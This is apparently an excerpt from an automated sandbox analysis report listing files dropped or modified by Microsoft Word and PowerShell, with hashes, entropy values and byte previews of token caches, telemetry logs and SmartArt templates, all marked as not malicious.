                                                                                                                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.J.1.m.u.g.S.o.z.s.S.9.x.S.Z./.Q.v.O.c.+.E.J.4.u.2.c.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.N.c.s.t.R.R.S.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.W.C.V.5.m.F.

                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2684
                                                                                                                                                        Entropy (8bit):3.9103020870302796
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:48:uiTrlKxJxTxl9Il8utr4Z5Dg5qGJeZwBnfkvQdPbznvU0zd/vc:iYrrCfGDJxbznvvu
                                                                                                                                                        MD5:BA31C566AE2E67DD4F789FBB6C1BD541
                                                                                                                                                        SHA1:34B02C6085092EAC5C110A3C49638520A3E62063
                                                                                                                                                        SHA-256:55D2DFCFCD51E99A89A2148FF945F02BCF532C9FDDB1D0A7B1CC1F558693192E
                                                                                                                                                        SHA-512:3C0514FC6FFAD07777457E2E354AB375C56C28B4D32C7069A518E27769C875CB87D9FCE013DDF811A9C5879B04FC39DFEAE6603157A241FDC9CF0441756396BC
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.H.X.L.G.R.5.H.j.D.k.3.C.i.F.b.L.a.m.K.N.+.n.c.g.T.0.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".b.Z.C.1.z.N.1.w.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.W.C.V.5.m.F.

                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4542
                                                                                                                                                        Entropy (8bit):4.001180058513251
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:xIYra/01Knoh/P+HviIg4kCZS/ldGR5HJzMltmimUS:xIe91miIdkRtIR5DF
                                                                                                                                                        MD5:73A657A1A36CE119BAB007F50F6E7F8C
                                                                                                                                                        SHA1:C6440D286734C361754A81F7A51C996C6B9C7974
                                                                                                                                                        SHA-256:A6FB8006489B40FEC33BBC37587EE9CF79BE950F1325D0FBF4CD65CF37F0D1EA
                                                                                                                                                        SHA-512:E621F01F4B9FCB27FFE30F1E45CEADB9AC218243054C65D6614ECB05FD7A35D6224B28760C76A60F6DC7CC7425EC07F7D7CB41E7CA762625928FB3FEDC6A4666
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.q.Y.a.6.3.X.Y.9.b.4.Y.b.C.Z.g.f.0.u.y.E.6.v.n.x.e.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".T.C.8.w.m.w.x.S.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.W.C.V.5.m.F.

                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{397171DA-64B4-481F-9764-0D089776986F}.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1024
                                                                                                                                                        Entropy (8bit):0.05194905805374581
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:1lvlxlln:vz
                                                                                                                                                        MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                                                                                                                                                        SHA1:D15075354757A59DE6E057435511D956663955FB
                                                                                                                                                        SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                                                                                                                                                        SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:modified
                                                                                                                                                        Size (bytes):11608
                                                                                                                                                        Entropy (8bit):4.8908305915084105
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:yVsm5eml2ib4LxoeRm3YrKkzYFQ9smKp5pVFn3eGOVpN6K3bkkjo5xgkjDt4iWNH:yCib4PYbLVoGIpN6KQkj2qkjh4iUx6iP
                                                                                                                                                        MD5:FE1902820A1CE8BD18FD85043C4D9C5C
                                                                                                                                                        SHA1:62F24EAE4A42BA3AE454A6FAB07EF47D1FE9DFD6
                                                                                                                                                        SHA-256:8BBDC66564B509C80EA7BE85EA9632ACD0958008624B829EA4A24895CA73D994
                                                                                                                                                        SHA-512:8D1BADE448F0C53D6EC00BC9FACDBCB1D4B1B7C61E91855206A08BDBF61C6E4A40210574C4193463C8A13AE692DD80897F3CE9E39958472705CF17D77FE9C1D9
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PSMODULECACHE.....$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...

                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):64
                                                                                                                                                        Entropy (8bit):1.1510207563435464
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:NlllulBkXj:NllUS
                                                                                                                                                        MD5:453075887941F85A80949CDBA8D49A8B
                                                                                                                                                        SHA1:7B31CA484A80AA32BCC06FC3511547BCB1413826
                                                                                                                                                        SHA-256:84466098E76D1CF4D262F2CC01560C765FE842F8901EEE78B2F74609512737F8
                                                                                                                                                        SHA-512:02E95B30978860CB5C83841B68C2E10EE56C9D8021DF34876CD33FD7F0C8B001C288F71FBBFF977DDF83031BD6CD86AC85688A6EFB6300D0221AA4A22ABE7659
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:@...e................................................@..........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1734609078996808300_711A8758-734B-4461-80E9-D0F30DFAD833.log

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):20971520
                                                                                                                                                        Entropy (8bit):0.016896224754793916
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:8DT9CjEtvG9ogFITl2DjJl10Zf+mBWjrz+6ng5gMB5:a
                                                                                                                                                        MD5:D04C1FA3B959E9808BFD4B342EC68C83
                                                                                                                                                        SHA1:01C67F860E68A97D57AC2BE3B4BDCFDA71A961D3
                                                                                                                                                        SHA-256:D24859A3ED26394440BDD99F681121C7427F3A1E870C9CE59C89145FEE37679C
                                                                                                                                                        SHA-512:561161ABEF6EBA0C8D5F93ED043CCFC5D5D365CCF27FB5E905431CE72A5CB8CEE18C2324C88CA555E726A45823EF95DBF54AEF8EED5E4B242C53CC41BC141356
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..12/19/2024 11:51:19.240.WINWORD (0x1E40).0x116C.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":22,"Time":"2024-12-19T11:51:19.240Z","Contract":"Office.System.Activity","Activity.CV":"WIcacUtzYUSA6dDzDfrYMw.7.1","Activity.Duration":935,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Activity.Result.Code":-2147024890,"Activity.Result.Type":"HRESULT","Activity.Result.Tag":528307459}...12/19/2024 11:51:19.240.WINWORD (0x1E40).0x116C.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.ProcessIdleQueueJob","Flags":33777014401990913,"InternalSequenceNumber":23,"Time":"2024-12-19T11:51:19.240Z","Contract":"Office.System.Activity","Activity.CV":"WIcacUtzYUSA6dDzDfrYMw.7","Activity.Duration":9663,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Data.FailureD

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1734609078997485400_711A8758-734B-4461-80E9-D0F30DFAD833.log

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):20971520
                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3::
                                                                                                                                                        MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                                                                                                                                        SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                                                                                                                                        SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                                                                                                                                        SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7D54.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):246
                                                                                                                                                        Entropy (8bit):3.5039994158393686
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUX4f+E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvGHmD0+dAH/luWvv
                                                                                                                                                        MD5:16711B951E1130126E240A6E4CC2E382
                                                                                                                                                        SHA1:8095AA79AEE029FD06428244CA2A6F28408448DB
                                                                                                                                                        SHA-256:855342FE16234F72DA0C2765455B69CF412948CFBE70DE5F6D75A20ACDE29AE9
                                                                                                                                                        SHA-512:454EAA0FD669489583C317699BE1CE5D706C31058B08CF2731A7621FDEFB6609C2F648E02A7A4B2B3A3DFA8406A696D1A6FA5063DDA684BDA4450A2E9FEFB0EF
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.b.e.d.A.r.c...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7D54.tmp\TabbedArc.glox

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3683
                                                                                                                                                        Entropy (8bit):7.772039166640107
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                                                                                                                                        MD5:E8308DA3D46D0BC30857243E1B7D330D
                                                                                                                                                        SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                                                                                                                                        SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                                                                                                                                        SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7D76.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):260
                                                                                                                                                        Entropy (8bit):3.4895685222798054
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUX4cPBl4xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyPl4xoGHmD0+dAH/luWvv
                                                                                                                                                        MD5:63E8B0621B5DEFE1EF17F02EFBFC2436
                                                                                                                                                        SHA1:2D02AD4FD9BF89F453683B7D2B3557BC1EEEE953
                                                                                                                                                        SHA-256:9243D99795DCDAD26FA857CB2740E58E3ED581E3FAEF0CB3781CBCD25FB4EE06
                                                                                                                                                        SHA-512:A27CDA84DF5AD906C9A60152F166E7BD517266CAA447195E6435997280104CBF83037F7B05AE9D4617323895DCA471117D8C150E32A3855156CB156E15FA5864
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.r.y.i.n.g.W.i.d.t.h.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7D76.tmp\VaryingWidthList.glox

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3075
                                                                                                                                                        Entropy (8bit):7.716021191059687
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                                                                                                                                        MD5:67766FF48AF205B771B53AA2FA82B4F4
                                                                                                                                                        SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                                                                                                                                        SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                                                                                                                                        SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7D77.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):264
                                                                                                                                                        Entropy (8bit):3.4866056878458096
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUX0XrZUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXWloGHmD0+dAH/luWvv
                                                                                                                                                        MD5:6C489D45F3B56845E68BE07EA804C698
                                                                                                                                                        SHA1:C4C9012C0159770CB882870D4C92C307126CEC3F
                                                                                                                                                        SHA-256:3FE447260CDCDEE287B8D01CF5F9F53738BFD6AAEC9FB9787F2826F8DEF1CA45
                                                                                                                                                        SHA-512:D1355C48A09E7317773E4F1613C4613B7EA42D21F5A6692031D288D69D47B19E8F4D5A29AFD8B751B353FC7DE865EAE7CFE3F0BEC05F33DDF79526D64A29EB18
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7D77.tmp\ThemePictureAccent.glox

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):6448
                                                                                                                                                        Entropy (8bit):7.897260397307811
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                                                                                                                                        MD5:42A840DC06727E42D42C352703EC72AA
                                                                                                                                                        SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                                                                                                                                        SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                                                                                                                                        SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7D88.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):254
                                                                                                                                                        Entropy (8bit):3.4721586910685547
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUX9+RclTloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyteUTloGHmD0+dAH/luWvv
                                                                                                                                                        MD5:4DD225E2A305B50AF39084CE568B8110
                                                                                                                                                        SHA1:C85173D49FC1522121AA2B0B2E98ADF4BB95B897
                                                                                                                                                        SHA-256:6F00DD73F169C73D425CB9895DAC12387E21C6E4C9C7DDCFB03AC32552E577F4
                                                                                                                                                        SHA-512:0493AB431004191381FF84AD7CC46BD09A1E0FEEC16B3183089AA8C20CC7E491FAE86FE0668A9AC677F435A203E494F5E6E9E4A0571962F6021D6156B288B28A
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.e.v.r.o.n.a.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7D88.tmp\chevronaccent.glox

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4243
                                                                                                                                                        Entropy (8bit):7.824383764848892
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
